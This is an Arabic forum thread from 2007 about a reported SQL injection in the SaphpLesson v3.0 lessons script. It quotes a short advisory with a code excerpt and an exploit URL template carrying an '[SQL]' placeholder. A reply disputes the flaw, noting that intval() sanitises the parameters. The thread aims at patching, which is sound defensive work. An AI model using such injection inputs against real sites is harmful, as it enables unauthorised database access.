شوّيت: شبكة كرة قدم اجتماعية




العودة   سوالف سوفت > سوالف برمجة المواقع وتطويرها > الويب والويب 2.0 والـ Semantic Web
التسجيل المدوّنات البحث مشاركات اليوم جعل الأقسام مقروءة

الوسوم: ,

الرد على الموضوع
 
LinkBack أدوات الموضوع
عضو نشيط جدا
#1  
ثغرة خطيرة في سكربت الدروس الأخير

السلام عليكم ورحمة الله

الحمد لله على كل حال ملف واحد مصاب لو يجد لنا الأخوان حل في ترقيعها وهي ثغرة من نوع SQL Injection

المصدر
http://www.securityfocus.com/archive.../30/0/threaded
تحياتي لكم

كود PHP:
//////////////////2007/////////////////////
//SaphpLesson v3.0 SQL Injection Exploit//
//////////////////////////////////////////
################################
Found by:SwEET-DeViL&HaCKeR sUn#
TeaM AL-GaRNi------------------#
Application : SaphpLesson------#
version : v3.0-----------------#
URL : No-----------------------#
################################
-------------------------------------------------------------------------------
Line 19'/'23 of showcat.php                                                  ||
---------------<?                                                            ||
$forumid intval($_GET["forumid"]);                                         ||
                                                                             ||
$Page    intval($_GET["Page"]);                                            ||
                                                                             ||
$tit     mysql_query("select Title,CatID from forums where id=$forumid");  ||
?>-----------------------------------------------------------------------------

ExploiTs :-
""""""""""
http://www.Site.com/Path/showcat.php?forumid=1&Page=-1[SQL]);#

/*'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''/*
END
 ___________K-S-A______________
|ــــــTeam AL-GaRNiـــــــــــ|
:::::::::::::::::::::::::::::::::
::-###########-----###########-::
::-###########-----###########-::
::-###-------------###-----###-::
::-###-------------###########-::
::-###---######----###########-::
::-###---##-###----###--###----::
::-###------###----###---###---::
::-############----###----###--::
::-############----###----###--::
:::::::::::::::::::::::::::::::::
|ـــــgamr-14@hotmail.comـــــــ|
|ـــــــــm-o-t@msn.comـــــــــ|






__________________
شـــكراَ سوالف ســـوفت ,,, قمة المواقع العربية بلا منازع

--|| سبحان الله والحمد لله والله أكـبر ||--
palover is offline   قديم 23-02-2007, 08:54 AM
الرد مع إقتباس
عضو نشيط جدا
#2  

ماظنيت انها ثغرة ..

لان المتغير يمرر لدالة Intval

ولك ان تجرب هذا الكود .. حتما ً لن تخرج لك نتيجة غير الارقام ..

كود PHP:
$i '-1;Select ....[SQL]';
$i intval($i); 
echo 
$i






__________________
موقعي الشخصي
www.Flasher.ws

جزيرة الفنون
www.Artsisland.net
Flasher is offline   قديم 23-02-2007, 09:58 AM
الرد مع إقتباس
الرد على الموضوع


 

أدوات الموضوع

قوانين المشاركات
لا يمكنك كتابة مواضيع جديدة
يمكنك إضافة ردود
لا يمكنك إرسال مرفقات
لا يمكنك تعديل مشاركاتك

كود vB متاح
كود [IMG] متاح
كود HTML غير متاح
Trackbacks are متاح
Pingbacks are متاح
Refbacks are متاح



جميع الأوقات بتوقيت غرينتش +3. الوقت الآن هو 08:28 AM.